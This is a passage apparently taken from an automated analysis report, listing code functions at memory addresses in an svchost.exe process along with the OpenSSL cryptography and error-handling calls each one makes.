Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3686190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,42_2_00007FFDA3686190
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA366C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,42_2_00007FFDA366C190
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3624160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624160
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3658160 CRYPTO_memdup,42_2_00007FFDA3658160
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA361E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,42_2_00007FFDA361E220
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36421E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,42_2_00007FFDA36421E0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36181E0 CRYPTO_get_ex_data,42_2_00007FFDA36181E0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA364C0D0 CRYPTO_free,42_2_00007FFDA364C0D0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3670070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,42_2_00007FFDA3670070
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3624060 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3624060
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3628140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3628140
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3610130 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3610130
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3650130 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3650130
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3624120 CRYPTO_set_ex_data,42_2_00007FFDA3624120
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3648120 CRYPTO_free,42_2_00007FFDA3648120
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36340E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA36340E0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36140E0 CRYPTO_get_ex_data,42_2_00007FFDA36140E0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36567D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,42_2_00007FFDA36567D1
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36507D0 CRYPTO_malloc,memcpy,CRYPTO_free,42_2_00007FFDA36507D0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA364A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA364A7D0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36627B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA36627B0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA365E790 CRYPTO_free,42_2_00007FFDA365E790
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3650770 CRYPTO_clear_free,CRYPTO_free,42_2_00007FFDA3650770
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA365A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA365A850
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3658850 CRYPTO_realloc,42_2_00007FFDA3658850
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3624840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624840
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3608812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,42_2_00007FFDA3608812
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA364E810 CRYPTO_zalloc,42_2_00007FFDA364E810
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3654800 OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA3654800
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA367C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,42_2_00007FFDA367C7E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36027F0 DeleteCriticalSection,CRYPTO_free,42_2_00007FFDA36027F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365E6D0 CRYPTO_malloc,42_2_00007FFDA365E6D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624660 CRYPTO_free,CRYPTO_malloc,memcpy,42_2_00007FFDA3624660
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA364E660
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3652740
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365E730 CRYPTO_free,42_2_00007FFDA365E730
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3608720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3608720
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA360E700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364C700 CRYPTO_malloc,memcmp,memcpy,memcpy,42_2_00007FFDA364C700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA364A5C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36525B0 OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA36525B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36345A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA36345A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36125A0 CRYPTO_strdup,CRYPTO_free,42_2_00007FFDA36125A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368C5A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3628580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3628580
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3672630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3672630
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652630 OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3652630
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA361C610
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36124D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,42_2_00007FFDA36124D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624490
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3642470 CRYPTO_zalloc,42_2_00007FFDA3642470
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,42_2_00007FFDA3602460
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3684460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,42_2_00007FFDA3684460
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,42_2_00007FFDA363E510
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3682500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,42_2_00007FFDA3682500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3636BB0 CRYPTO_malloc,42_2_00007FFDA3636BB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,42_2_00007FFDA3652BA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3678B90 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3678B90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3668B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3668B90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362CB80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,42_2_00007FFDA360AB80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364AB80 CRYPTO_free,42_2_00007FFDA364AB80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,42_2_00007FFDA360CB70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,42_2_00007FFDA364AC50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA361ABF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361AAD0 CRYPTO_set_ex_data,42_2_00007FFDA361AAD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3680AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3680AD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,42_2_00007FFDA360CAB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3616A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,42_2_00007FFDA3616A90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602A80 CRYPTO_free,CRYPTO_free,42_2_00007FFDA3602A80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3614A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3614A72
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365AA70 CRYPTO_realloc,42_2_00007FFDA365AA70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3634A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,42_2_00007FFDA3634A60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3666A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3666A60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3636B30 CRYPTO_free,CRYPTO_free,42_2_00007FFDA3636B30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3680B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3680B30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,42_2_00007FFDA366CB30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3670B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,42_2_00007FFDA3670B20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365EB20 CRYPTO_free,42_2_00007FFDA365EB20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,42_2_00007FFDA361E9C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36749C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA36749C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362C9A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,42_2_00007FFDA364E960
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3676A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3676A30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3624A20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36149F0 CRYPTO_memdup,CRYPTO_free,42_2_00007FFDA36149F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36869E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,42_2_00007FFDA36869E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36468B0 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA36468B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,42_2_00007FFDA362A8B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368A8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA368A8B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,42_2_00007FFDA368C890
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360E880 CRYPTO_THREAD_run_once,42_2_00007FFDA360E880
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3672880 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3672880
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602860 CRYPTO_zalloc,InitializeCriticalSection,42_2_00007FFDA3602860
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,42_2_00007FFDA3602940
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365A940 CRYPTO_zalloc,42_2_00007FFDA365A940
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3672930 CRYPTO_realloc,42_2_00007FFDA3672930
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA364A910
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3688FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3688FD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3606FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,42_2_00007FFDA3606FC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,42_2_00007FFDA366EFA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3662FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3662FA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3676F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3676F60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,42_2_00007FFDA3652F60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615050 CRYPTO_set_ex_data,42_2_00007FFDA3615050
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3625040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3625040
